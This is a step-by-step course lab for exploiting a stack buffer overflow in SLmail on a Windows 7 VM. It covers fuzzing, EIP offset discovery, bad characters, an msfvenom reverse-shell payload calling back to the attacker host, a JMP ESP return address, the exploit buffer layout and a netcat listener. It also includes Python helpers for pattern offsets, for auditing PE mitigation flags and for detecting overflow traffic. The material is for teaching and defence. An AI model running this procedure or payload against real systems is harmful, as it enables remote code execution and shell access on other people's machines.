1. **Prepare the Parrot OS and Windows 7 VMs:**
    - Start your UTM instance with both the Parrot OS (NAT mode) and Windows 7 VMs active.
    - Switch Parrot OS to "Host-only network" mode and note down its IP address.
    - Ensure you can ping the Windows 7 VM from Parrot OS.
2. **Download the required files:**
    - Download the "Scripts.zip" file from Blackboard (T2, Week 2) on your Parrot OS.
    - Extract the contents of "Scripts.zip" to a convenient location, e.g., `/opt/exploit-dev/scripts/`.
3. **Run SLmail and Immunity Debugger (ID):**
    - Start SLmail on the Windows 7 VM.
    - Run Immunity Debugger as an administrator. To make the font more legible, right-click on the black disassembly area > Appearance > Font > OEM.
4. **Attach SLmail to ID:**
    - In Immunity Debugger, go to `File > Attach…`, select the SLmail process, and click 'Open'.
    - A freshly attached process is paused: click the "Run" button in the toolbar so that the status bar in the bottom-right corner reads "Running".
5. **Run the fuzzer:**
    - Open a terminal on Parrot OS and navigate to the scripts directory.
    - Run `python fuzzer.py <Windows 7 VM IP address> 49500` (SLmail's default port is 49500) to start fuzzing the application.
    - The goal is to crash SLmail by sending it random data; watch Immunity Debugger for the access violation that marks the crash.
6. **Generate a unique 4-byte pattern:**
    - Run `ruby pattern_create.rb <length>` (e.g., `ruby pattern_create.rb 100`) to generate a cyclic pattern in which every 4-byte window occurs only once, so that the 4 bytes that land in EIP identify exactly where in the input the crash occurred.
7. **Find the starting offset:**
    - Send the generated pattern to SLmail using the fuzzer and read the value left in EIP when it crashes. The offset is the number of bytes sent before the four that overwrite EIP.
    - Use `ruby pattern_offset.rb <EIP value>` to look that value up in the pattern and confirm the offset.
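How the two pattern scripts in steps 6 and 7 work, as an added Python example that is neither one of the lab's scripts nor Metasploit's own code: `pattern_create` builds the same upper/lower/digit cyclic sequence that `pattern_create.rb` emits, and `pattern_offset` maps a 4-byte EIP value, given either as the four characters or as the little-endian hex dword Immunity Debugger displays, back to its byte offset. The function and variable names are my own.

```python
import string
from typing import Optional

# Constructed re-implementation of the pattern_create / pattern_offset idea.
# The sequence is every (uppercase, lowercase, digit) triplet in order, so any
# 4-byte window occurs at exactly one position within the first 20280 bytes.
_FULL_PATTERN = "".join(
    u + l + d
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
)
MAX_UNIQUE_LENGTH = len(_FULL_PATTERN)  # 26 * 26 * 10 * 3 = 20280


def pattern_create(length: int) -> str:
    """Return the first `length` bytes of the cyclic pattern (what pattern_create.rb prints)."""
    if length < 1 or length > MAX_UNIQUE_LENGTH:
        raise ValueError(f"length must be 1..{MAX_UNIQUE_LENGTH}; longer patterns repeat")
    return _FULL_PATTERN[:length]


def pattern_offset(value: str, length: int = MAX_UNIQUE_LENGTH) -> Optional[int]:
    """Map the value that landed in EIP back to its offset in the pattern.

    `value` is either the four pattern characters, or the dword as the debugger
    shows it (e.g. "0x39694438").  x86 is little-endian, so the displayed dword
    is the four input bytes in reverse order; undo that before searching.
    Returns None when the value does not occur in the first `length` bytes.
    """
    if value.lower().startswith("0x"):
        raw = bytes.fromhex(value[2:].zfill(8))
        needle = raw[::-1].decode("ascii", errors="replace")
    else:
        needle = value
    if len(needle) != 4:
        raise ValueError("expected a 4-byte value")
    pos = _FULL_PATTERN[:length].find(needle)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    print(pattern_create(100))
    print(pattern_offset("0x39694438"))
```

If `pattern_offset` returns None, the crash did not overwrite EIP with pattern bytes at all (or the pattern sent was shorter than the offset), which is the first thing to rule out before trusting the number.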
8. **Verify the offset:**
    - Send a crafted payload in which the 4 bytes at the offset are set to a recognisable value, and confirm in the debugger that EIP holds exactly that value; this proves the previous steps were accurate.
    - Use `python sendshell.py <Windows 7 VM IP address> 49500 "<EIP>" "stupid string"` to send the crafted payload.
9. **Check for space on the stack:**
    - Send approximately 800 bytes after the EIP location to verify there is enough space for our payload.
    - Use `ruby space.rb <offset> 800` to check the available space.
10. **Find bad characters:**
    - Identify byte values that the application truncates, alters or treats as terminators (so the bytes after them never reach memory intact); these must be excluded from the shellcode.
    - Use `ruby badchars.rb <Windows 7 VM IP address> 49500 <offset>` to send every byte value and list the ones that do not survive; compare the bytes in memory against what was sent.
11. **Create shellcode:**
    - Use msfvenom to create a payload (shellcode) for the target architecture, excluding the bad characters identified earlier; the shell it spawns runs with the privileges of the SLmail process.
    - Run `msfvenom -p windows/shell_reverse_tcp LHOST=<Parrot OS IP address> LPORT=443 -a x86 --bad-chars="<bad_characters>" -f raw` to generate the shellcode (bad characters are given as an escaped string, e.g. `"\x00"`).
12. **Identify a DLL without memory protections:**
    - Use `!mona modules` in Immunity Debugger to list the loaded modules and their protections; we need one that is not rebased and has no SafeSEH, ASLR or DEP (NXCompat) flags set, so that its addresses are stable and its code usable.
    - Our target is `slmfc.dll`.
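What `!mona modules` is checking for each loaded module, as an added Python example that is not part of the lab or of mona: it parses a PE image's COFF and optional headers and reports whether the image opts into ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT) and whether it can be rebased (relocations present). SafeSEH lives in the load-config directory and is not parsed here. `make_pe32_stub` builds a constructed, non-loadable header purely so the check can be exercised offline; on a real DLL call `audit_pe(open(path, "rb").read())`. All names are mine.

```python
import struct
from typing import Dict, Iterable, List, Tuple

# DllCharacteristics flags (optional header) and one COFF Characteristics flag.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400        # image declares it uses no SEH
IMAGE_FILE_RELOCS_STRIPPED = 0x0001             # no relocations: cannot be rebased


def audit_pe(data: bytes) -> Dict[str, bool]:
    """Read the mitigation flags from a PE image (only the headers are parsed)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    coff_characteristics = struct.unpack_from("<H", data, coff + 18)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError(f"unexpected optional header magic 0x{magic:x}")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "aslr": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        "rebase": not (coff_characteristics & IMAGE_FILE_RELOCS_STRIPPED),
    }


def lacks_mitigations(flags: Dict[str, bool]) -> bool:
    """True when the module has neither ASLR nor DEP: its addresses are fixed and
    its pages executable, which is what step 12 looks for and what a defender
    should rebuild with /DYNAMICBASE and /NXCOMPAT."""
    return not flags["aslr"] and not flags["dep"]


def make_pe32_stub(dll_characteristics: int, coff_characteristics: int = 0) -> bytes:
    """Constructed minimal PE32 header for offline testing; it is not loadable."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine 0x14C (i386), 1 section, no timestamp/symbols, 96-byte optional header.
    coff_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 96, coff_characteristics)
    optional = bytearray(96)
    struct.pack_into("<H", optional, 0, 0x10B)              # PE32 magic
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return dos_header + b"PE\0\0" + coff_header + bytes(optional)


def audit_modules(modules: Iterable[Tuple[str, bytes]]) -> List[Tuple[str, Dict[str, bool], bool]]:
    """Mona-style table: one row of (name, flags, lacks_mitigations) per module."""
    rows = []
    for name, image in modules:
        flags = audit_pe(image)
        rows.append((name, flags, lacks_mitigations(flags)))
    return rows


if __name__ == "__main__":
    # Constructed sample: one hardened module and one built without any flags.
    sample = [
        ("hardened_constructed.dll", make_pe32_stub(0x0140)),
        ("legacy_constructed.dll", make_pe32_stub(0x0000)),
    ]
    for name, flags, weak in audit_modules(sample):
        print(f"{name:26} ASLR={flags['aslr']!s:5} DEP={flags['dep']!s:5} "
              f"Rebase={flags['rebase']!s:5} {'<- no mitigations' if weak else ''}")
```

Note that a module with DEP but without ASLR still has fixed addresses, and a module with ASLR can still be found at a fixed address if it cannot be rebased; the two flags and the relocation check answer different questions, so inspect all of them rather than a single "protected" verdict.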
13. **Find a JMP ESP address:**
    - Use nasm_shell to get the opcode bytes for `JMP ESP`: type `JMP ESP` at the nasm_shell prompt and it prints `FF E4`.
    - Use `!mona find -s "\xff\xe4" -m slmfc.dll` to search slmfc.dll for the FF E4 bytes and choose one of the addresses it returns (e.g., `0x5f4a358f`) as the new EIP value.
14. **Prepare the exploit script:**
    - Replace the `Bs` in the exploit script (e.g., `exploit.rb`) with the address chosen earlier, written as little-endian bytes (for `0x5f4a358f` that is `"\x8f\x35\x4a\x5f"`).
    - Add a NOP sled (e.g., `"\x90" * 16`) after the JMP ESP address and before the shellcode, so that slight shifts in where ESP points still land inside the sled.
    - The buffer the script sends should look something like this: `"A" * <offset> + "\x8f\x35\x4a\x5f" + "\x90" * 16 + <shellcode from msfvenom>`.
15. **Start a netcat listener:**
    - On Parrot OS, run `nc -lvp 443` to start a netcat listener on port 443.
16. **Run the exploit:**
    - Execute the prepared exploit script with `ruby exploit.rb <Windows 7 VM IP address> 49500`.
    - Once the exploit triggers, the netcat listener should receive a shell on the Windows 7 VM running with the privileges of the SLmail process.
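What the traffic from steps 5 to 16 looks like to the service's own logging or to a network sensor, as an added Python example that is not part of the lab: a small detector applied to constructed POP3-style command lines (assuming SLmail is reached over a line-based text protocol), flagging oversized arguments, `pattern_create`-style cyclic sequences, NOP sleds and payload-like runs of non-printable bytes. The thresholds, the sample session and all names are my assumptions.

```python
import re
from typing import List, Tuple

# Assumed thresholds: legitimate POP3 arguments (user names, passwords, message
# numbers) are short; anything past this length is worth a look.
MAX_ARG_LEN = 256
NONPRINTABLE_RATIO = 0.30

# pattern_create-style output: runs of (upper, lower, digit) triplets.
CYCLIC_RE = re.compile(rb"(?:[A-Z][a-z][0-9]){4,}")
# Eight or more x86 NOPs (0x90) in a row.
NOP_SLED_RE = re.compile(rb"\x90{8,}")


def inspect_command(line: bytes) -> List[str]:
    """Return the reasons (if any) a single command line looks like overflow traffic."""
    findings: List[str] = []
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    verb_text = verb.decode("ascii", errors="replace")
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"oversized {verb_text} argument ({len(arg)} bytes)")
    if CYCLIC_RE.search(arg):
        findings.append("cyclic pattern (offset discovery)")
    if NOP_SLED_RE.search(arg):
        findings.append("NOP sled")
    if arg:
        nonprintable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
        if nonprintable / len(arg) > NONPRINTABLE_RATIO:
            findings.append("high ratio of non-printable bytes (possible shellcode)")
    return findings


def scan(lines: List[bytes]) -> List[Tuple[int, List[str]]]:
    """Scan a captured command stream; return (index, findings) for suspicious lines."""
    hits = []
    for index, line in enumerate(lines):
        findings = inspect_command(line)
        if findings:
            hits.append((index, findings))
    return hits


# Constructed sample session: two normal commands, then what the fuzzer (step 5),
# the pattern send (step 7) and a final exploit buffer (step 16) look like on the
# wire.  "BBBB" stands in for the return address and 0xCC bytes for the shellcode.
SAMPLE_SESSION = [
    b"USER test\r\n",
    b"PASS hunter2\r\n",
    b"PASS " + b"A" * 3000 + b"\r\n",
    b"PASS " + b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1" + b"\r\n",
    b"PASS " + b"A" * 2600 + b"BBBB" + b"\x90" * 16 + b"\xcc" * 200 + b"\r\n",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_SESSION):
        print(f"line {index}: " + "; ".join(findings))
```

The length check alone catches every stage of the procedure above, because the whole technique depends on sending far more data than the field was designed for; the other signatures only add confidence and tell the analyst which stage the sender had reached.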